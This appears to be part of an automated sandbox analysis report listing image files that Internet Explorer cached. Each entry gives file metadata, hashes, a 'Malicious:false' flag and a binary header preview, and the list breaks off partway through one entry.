                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..5..R6.i...Bf%..+#6....H.<..@p......V.-@.a.LF.K..)\.V....1.F9. Xo.Hc3.&.E8...Ut%.&.jJ."...E._#....X.E<Ve.Z......C1YH$..#.)...!.c....P...-.......&..D.-...5.......y..c..<...W..1=h............qR2_1...%.F"...H0E.`.L...hH.1|.. .$.....G..z..kx.......7Z,......,.)0...&....G4.'.v..'.#.jLe)d...$....\Ev.$.$~5V..9.k.@I...Q.$.).......}..K..`..(.em.C/.z..@J...y._Z.r....Hc.=h.,.t.....pG..A..Z
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AANg50h[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):40569
                                        Entropy (8bit):7.954892481469937
                                        Encrypted:false
                                        SSDEEP:768:ILhyA//Akly9981n74czNrDrLjXGik/48pcO0JPX3SEebK:IEmAkQ81Ug73UfefSEj
                                        MD5:B0989E31EDD523B96803E1AF9153AA0C
                                        SHA1:F0E256D8E5C95FF66618EAE588B074E4E5BAF831
                                        SHA-256:2F64ACD4B6DDBC2291738375B81AF48DFE287A731ECDF5AF977DFC53E3EB763A
                                        SHA-512:06A87F74E757AE2A341CB37AD6C9BD5351964B951D460FB52F25E44329B6283AFB456639E731A504EFD2BF49A2B4FD0691FF04FBA3C00E8AC031A7795992A3FC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..?..b...{...m.z.T...1.:.n.P..x..f..q[.iN.....lFCP...f82b.$MR.*.......@.0.\.........k,g...................O..|Z...R....p...L....+.....&s.....}.;.k.[.)..v..y....L9K..^.R....SI..%..*(.-..._2...>a..t.y...R....n.l....Q.2.W.Z..eQ..9..K@.nv..2......;..)2...,l0.H...?...l..^....W;..u*...+jR..nu'S...g]....y.v,..kN.......E...Zw..E..}.w....../..Qt......._..t"....{x..e.....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AANg9R8[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):27866
                                        Entropy (8bit):7.9012317290639515
                                        Encrypted:false
                                        SSDEEP:768:I2Zq3LwC9rPFs42M/6+qsP2BvpTRohxC9HW9M0dAqT:I80drPhR6HuvAqT
                                        MD5:22A765E78393D6675377E20F60E382DE
                                        SHA1:94F6AF29EA57274BFEEE6CCD41EDDB14F0583F24
                                        SHA-256:E621E02B6BB36B9FE5FD1F2E47D08EBCC8BAC15275F3F70569FBC7E116E6F342
                                        SHA-512:B2AAC7B7BC88BEE4BEC9D6EFFC252924B3E7D923C5B9E2FECB90260F29A48BE9A7A16CF04FF0926461CA98AE2E69C116D138335C228A863EB0D8C27F98D02C83
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....x...8"..N.5........Y..0}..k.....ib....'..)I..1..@..Sb..0...W#...jYS...+SN.n..{qJ.l.>.8.w.1..`.... .U.$c.5.[..kxF]..*.Hm....@....Ur...6."..mI..L..;2,.i...>R3.Ab.]@.]....Y.RF ..$T.4U.c$.TX..........1I#H.....B.....3z.|.L.p.=..;.|.${.n.nN./p*....'Ke...7e..U._......../.E...G.....a.?......O...4C8.?*Wab6...).....qr....N..q..).....~])....c.......<.-...4.I.C.`.=...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfZRW[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):3093
                                        Entropy (8bit):7.883981124809078
                                        Encrypted:false
                                        SSDEEP:96:Qf7EjVwJE8Bk2ppZBt6s5sdskI5Gxo9y3:QjKwDBk2ppZrisJny3
                                        MD5:7C5FA8940D22DC4F3D60519B642B8C28
                                        SHA1:8D0F3497374593EE162727BE3A81915A55EF5578
                                        SHA-256:68A4A72586D9238169A10DE1D1FF65383240747BF93F88F527942D0E9B019F92
                                        SHA-512:DBBA752921646D24051236E2DD7CFFB3B611E3CAF3D300EC948FC1D8B51036D7B6E97E4590340306E8A2E3770088CE21D9BE553AAF0562E703067B06E4972699
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..HB..z.U"IS....0%..I>...z....a.s..HM.P[..........$.8.<#..,.O5....s.iY1..&./#y..._..h.Av..jv...y....F.*^^.].Y....A..fT...-.eG.Q..~.@...*Qn..3..\.$d....n.....ad..\..._....v...U.r.d.L.Z....C+...Y[8..7..BK+o2I.......8.Rq...y..#...1.j.A...B......-........*.N@'....q5bO..Rya[=4.bv<..N.Q.ym.D...<$:I.#.k..W.V)...4...{...n......Z..FtzM.....#..Q.C,_@.X.P`...SL.k....n.\.R.....5/m...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgLtL[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):12204
                                        Entropy (8bit):7.760356414393578
                                        Encrypted:false
                                        SSDEEP:192:Q2ocxYvdubJzbjF4rcDHiz3U68cXNsT0t16iDUVVH6Gb029cbDc1+fCYyGqqpo2r:NosSuF3WggFk0tgioVV0dCYyGXn11sA/
                                        MD5:809C75ECB371E6428E0D21641C6758FD
                                        SHA1:06EF08CCC013EFF1AAD201C7F1BD3C288350B274
                                        SHA-256:3B7A81B0CEC9930FDAF2EE0BDCBD475ED69656DF7237B4795C8B021E3A71A725
                                        SHA-512:52D3EDCD559F525D6E941E63D88CC243A0F11212D7172AA089B672505D9DB94DB68BE1300E9BAB00D150E1E644891999483FFBDF0791E8E2EE8ECBA66E25D81F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...eX3@.&h..4.f....f.."..u....7P....u....7P.n..-H.d...~.x......Jo.h.g...W.......>..?.....O...\..F....._.c..vb.(M.B....eow..|........>F......}.....<Epq..s..O.w.1..|k}......8..rD\._..^....?.o.4.b..3$.....n.f.'.t.?.4....C.Qly.....o..4`.Y.....RC..@.3E....=.?..w/...B..~...n..E......ZW..>..`..L...J....fd...W....e..P..E...>........o.)|..G.>...=..1y.7..@.q......#....+......b.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgbmq[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):6289
                                        Entropy (8bit):7.851523332145787
                                        Encrypted:false
                                        SSDEEP:96:QfQErg7WA8UKQ9FQeAAdE7XqMnyVvzoTUtmnw66zfMcg84pGEuji9zoybBbqr:Qoag7WA8liF669N36eEtjpG9jFY2
                                        MD5:07F426B9CCD868F4A649262096340195
                                        SHA1:0FBB15A464AA610660FA0C4FC0DC541AF1714797
                                        SHA-256:D2CB2DD7DAE25A68EFB5F3365A6ECCF7D1754A497FA0CB933DF6753E395A5CB9
                                        SHA-512:5E79975D852BF819A942CD6FAE7744AD75A081EC1562F4F243CD01B86B5CCECEF7976D239AED3D30A215922D5CD239F329BA2E970364365571C8CB7CDD833B2C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j.....N..w.....Z......h..............H(..@....@.a@.#..g\.@...&M!.:........f.q.;..D.@..%.........p..4.C@.4....6......<..8..x.....".#<P..6..P..4G..&..c.7.q.....v.M.s.U\,t5D.@.......3@.@...P...m!.h..."j.e.(...@......p....l....t...#....&....f"..=.(..jr...@.{.Y"..@..7..&9..P.(....@.4.F..`..(.<.......P..$..}0..@#.(...."../ulZF.CRY.u.o.8.,V}3gj..=^.......a<....:.......f.P.y. .;x...PX..9
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOggwL[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):12998
                                        Entropy (8bit):7.957875205331213
                                        Encrypted:false
                                        SSDEEP:384:bOhTptS/mgGPq4AQF+2SK2Fdtlr0voY49wNPci77P:bOhbSugGPq4zFotlr0uIP
                                        MD5:1D942C6E3EDD1A02F198321F9F653842
                                        SHA1:CB8A9BCC50B7001222AA6ED0070701A91E8D48E1
                                        SHA-256:8C71199E78444BF4AF8F2FB06A29084CB7A3B79605DC8C7027A01AE146BCDCC2
                                        SHA-512:245C76AFABA723A5F404DBEF1FDAA3A35B97D58B9C0A5AF4467D64E4821A0B8A9CF8BCF4E46145A9E39D224C996AC06A4D625BDF21C0DBD6C5C027B70AA3D37E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:@...*9`M0.9.y....N2zR.(...4l.g?5&.p...].....d.D.0.T.J...%..,....(e!...iC...].....b....b....O..A..d4Ykg)...G1\..8\.....94i.S.N.6.e..7...X....X.r...}+D....&....@...G<u...]+\.<P..id..y$....++.......`.<..-......=j#.F5.4...G.cr.....ZZ....>l..;..Z...s.Z......`% .T.N0(...pN=..(...^.9..-...~.'..`RJ.B0:....n....O"n.....kJ7..IY....B...................P2._1C..Q-...M..:b.Y.H.....q.../..v
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOguTA[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):8913
                                        Entropy (8bit):7.92704245333277
                                        Encrypted:false
                                        SSDEEP:192:Qo4x+X1wBOZURMxGfEa2Nbe/e33DLBH86cg2w:bnXqB0sVEa2Y/03xH8zw
                                        MD5:6A4DF2C42DA5EA53EA4B3A6CD2EDB5D2
                                        SHA1:10B2E4A7F7730E8D6BF42F121D42432C26CFC089
                                        SHA-256:D33985B0529FA6B886C455C39EE3946F11CB18336F038C72BC710C6D36CFCF03
                                        SHA-512:062B790B4B455BE51348700A0065E5C35D13A14ECFADB4AFFBF51578FA03D77BB579D745C031FA84C0E612E30729E91FABB4D626178240A868F74F7C05782D39
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4....P..R...^H..."....../v~?!@.W.$...........h..s..........5.M....9=.....R.W)4.......:;......,.!K.......Jv..p....:...r.n.Xu.CHd"....3..v&....!_.'pN..Z...I.v..Kk...........$.qh.".W.8>.D....(......J.(.JC..k0.u>....r.9..1.Mu.Y.........;..8....?.R.R...z.r...#.,O..k6.j.c...9f$....3.....RD.0I...{Qa\k..(....6'......6...#..h...FF>o.Z..q.....jC.%rs...>q....dw.....4.cwJ...U$..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAuTnto[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):777
                                        Entropy (8bit):7.619244521498105
                                        Encrypted:false
                                        SSDEEP:12:6v/7/+Qh6PGZxqRPb39/w9AoWC42k5a1lhpzlnlA7GgWhZHcJxD2RZyrHTsAew9:++RFzNY9ZWcz/ln2aJ/Hs0/ooXw9
                                        MD5:1472AF1857C95AC2B14A1FE6127AFC4E
                                        SHA1:D419586293B44B4824C41D48D341BD6770BAFC2C
                                        SHA-256:67254D5EFB62D39EF98DD00D289731DE8072ED29F47C15E9E0ED3F9CEDB14942
                                        SHA-512:635ED99A50C94A38F7C581616120A73A46BA88E905791C00B8D418DFE60F0EA61232D8DAAE8973D7ADA71C85D9B373C0187F4DA6E4C4E8CF70596B7720E22381
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx.]S]HSa.~.s.k...Y.....VF.)EfWRQQ.h%]..e.D)..]DA.%...t...Q.....y.Vj.j.3...9.w..}......w...<..>..8xo...2L..............Q....*.4.)../'~......<.3.#....V....T..[M..I).V.a.....EKI-4...b... 6JY...V.t2.%......"Q....`.......`.5.o.)d.S...Q..D....M.U...J.+.1.CE.f.(.....g......z(..H...^~.:A........S...=B.6....w..KNGLN..^..^.o.B)..s?P....v.......q......8.W.7S6....Da`..8.[.z1G"n.2.X.......................2>..q...c......fb...q0..{...GcW@.Hb.Ba.......w....P.....=.)...h..A..`......j.....o...xZ.Q.4..pQ.....>.vT..H..'Du.e..~7..q.`7..QU...S.........d...+..3............%*m|.../.....M..}y.7..?8....K.I.|;5....@...u..6<.yM.%B".,.U..].+...$...%$.....3...L....%.8...A9..#.0j.\lZcg...c8..d......IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAud6Gv[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):356
                                        Entropy (8bit):7.101459310090333
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahmpAKG4NDBbCySVUc3/qF9Hio9hbifyZQw+bS2LblMid1Rc9ruhiFp:6v/73bCLVYHio9h8kQw+7BMW1W9rAir
                                        MD5:A94D5FFB98CBCA323E6AEA6A826B9ACF
                                        SHA1:D4F20C419292258A27A06511955A02400C767723
                                        SHA-256:7527C0E97B871894A7AC475D714D51E82F51BB965848DCD03657B12D5808BCAB
                                        SHA-512:D2B0D68C085457161F612B50508548D9FD6F7F48DE74AEC8009C65375A0CF0D58469BC8B93AC2705B4AB4A0F0D3FE07E8207500AD896FFC676D7D50649643A7D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx...j.A.....A..y..X....$.E.'.b.:.h!.bc%...:.FlD..L.@:...F...o...u..+.>nvf..v..n.;08..<.,C....-|A.x.D1.Mx....B.R>.......3..d@....%....v.Z...5.C....3@.a.[..iku.....%.(....p.h..m.](..s>F.&...q.^..dH......0<a1...4. .z.Q.@<W...,....4..?M.b......@{X..L..x...|:.B..B..K...j..k6/..LE@....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB15AQNm[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):29565
                                        Entropy (8bit):7.9235998300887145
                                        Encrypted:false
                                        SSDEEP:384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
                                        MD5:6B79D1438D8EFAF3B8DE6163107CEC71
                                        SHA1:E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
                                        SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                        SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4.m.!....4..i..4..l.C..u .pi....dRe#J..\..t..bC3.)..l.".W.#..&.....-&2.".&.(l..y...r...cE.7..h(#......t..E.....H.^b..../...5 ..r..4&R.>F.. ~..$..R.....1..WDV.L..j.^q..!...T.+..x.$.+._..<{Tc4!.^\$q.ZR`q...Y........A.Ld...(HM.....Z#2b.u40 ...J.F.j.*...Fy.."h..g.&...+H..$2...A....N.c.L...^..c...<Qa..[.. -..v.....-....xg.K.e+..'5[.... !@.ZM.b."....<.........~....(..".~
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1fdtSt[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):438
                                        Entropy (8bit):7.245257101036661
                                        Encrypted:false
                                        SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                        MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                        SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                        SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                        SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+.....hIDATx...O+DQ../]....f..(,.,-.!.L..X..ee.,.. .I.D..h..P,&.|.c.L.i.E.{.k..~.}.}........t...W...*.5.2..0)X0I.c.wbU.....N..,....-F...J#lSq.;....a...*.....D .w.g..N.....F)l..........`_..s..A;?.4..+..ob......Qh.H.:A......(....;.z./..?.:...t.[.e..b.......{..t.A....M..0.>8&_"... Ev.Z`.."...=/..F.}X....#|.Ny. Z......W...{HX;..F..w..M:...?W.<4B..!.I.....l.o...s....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB7hg4[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):470
                                        Entropy (8bit):7.360134959630715
                                        Encrypted:false
                                        SSDEEP:12:6v/7TIG/Kupc9GcBphmZgPEHfMwY7yWQtygnntrNKKBBN:3KKEc9GcXhmZwM9LtyGJKKBBN
                                        MD5:B6EA6C62BAEBF35525A53599C0D6F151
                                        SHA1:4FFEFB243AAEC286D37B855FBE33C790795B1896
                                        SHA-256:71CC7A3782241824ACDC2D6759E455399957E3C7C9433A1712C3947E2890A4D4
                                        SHA-512:0E4E87A66CF6E01750BC34D2D1EC5B63494A7F5C4B831935DD00E1D825CDB1CFD3C3E90F29D1D4076E7F24C9C287E59BE23627D748DB05FB433A3A535F115464
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx..QKN.A....(..1a.....p...o..T........./.......$..n\...V.C .b2.......qe'.T.1.1h8./.....$:Y6...w}_>...P.o$.n....X,<...R..y....$p.P..c.\.7..f...H.vm...I........b..K..3.....R..u...Z'.?..$.B...l.r....H.1....MN).c.K1H..........t...9........d.$.....:..8..8@t._...1.".@C....i&Z.'...A1...!....R....}.w.E4.|_..N.....b...(.^.vH........j......s...h. ..9.p!.....gT.=B.|..,=v.......G..c.5.....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB7hjL[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):462
                                        Entropy (8bit):7.383043820684393
                                        Encrypted:false
                                        SSDEEP:12:6v/7FMgL0KPV1ALxcVgmgMEBXu/+vVIIMhZkdjWu+7cW1T4:kMgoyocsOmIZIl+7cW1T4
                                        MD5:F810C713C84F79DBB3D6E12EDBCD1A32
                                        SHA1:09B30AB856BFFDB6AABE09072AEF1F6663BA4B86
                                        SHA-256:6E3B6C6646587CC2338801B3E3512F0C293DFF2F9540181A02C6A5C3FE1525A2
                                        SHA-512:236A88BD05EAF210F0B61F2684C08651529C47AA7DCBCD3575B067BEDCA1FBEE72E260441B4EAD45ABE32354167F98521601EA21DDF014FF09113EC4C0D9D798
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx...N.P...C.l...)...Mcb*qaC/..]..7..l...x.Z......w......._....<....|.........."FX.3.v.A.............1..Rt...}......;....BT.....(X.....(....4...-...f....0.8...|A.:P%.P..if.t..P..T.6..)s..H..~.C..(.7.s>....~...h..bz...Z.....D4Vm.T...2.5.U.P....q.6..1t~.ZU....7.i...".b.i.~...G.A!..&..+S.(<(...y._w..q........Q.l..1...Tz...Q...r.............g...+.o.]...J...$.8:.F..I.......XT..k.v....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBK9Hzy[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):480
                                        Entropy (8bit):7.323791813342231
                                        Encrypted:false
                                        SSDEEP:12:6v/7BusWIjbykLNgdQLPhgZPwb6txC3nUPuZZcb:MW6bykxgSh6a6TCStb
                                        MD5:163E7CEBA4224A9D25813CD756D138CC
                                        SHA1:062FFF66A1E7C37BAE1ECE635034A03C54638D50
                                        SHA-256:14525F17E552171DEE6D57C932287048185BE36D9AC25DA79CB02AD00657DEAF
                                        SHA-512:C37D77C1414B75CE6E3A90087B3C1E9D57AF6BCA4C140F1F4F43503D89C849EE1143315260A4DF92F1DD273305C15121FF199C04E946FA3BBD98B9B1D6636069
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx..R=H.Q.}...?....!... ..0h.B......!!.......h.j.........%i.J..%.5.:.._c.u.x.=....wQ...?.L.\E..] ...O.&.m..l.U.z..M6.....9.....(....3...x.O!3.....o&}.........]*.w....x..s.%..4.E.WX..{..!....4...2hB...c.m...]m0W."Y.,.2n.W..P.U.a .p...f.\gV....:0.4e........^s 4.j..0...u..*..t6....v..4...c8.4...0./i.Dh..../[t..h.5...!E$.....+..r..C.v......T<.....S..*z#.:...p.B.....").}R........=.....w.e......IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBX2afX[2].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):879
                                        Entropy (8bit):7.684764008510229
                                        Encrypted:false
                                        SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                        MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                        SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                        SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                        SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u.....*.,I"...)...z............>.OVObQ......d?|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ*!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...|X..."!..'*/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...K*q..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBY7ARN[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):779
                                        Entropy (8bit):7.670456272038463
                                        Encrypted:false
                                        SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                        MD5:30801A14BDC1842F543DA129067EA9D8
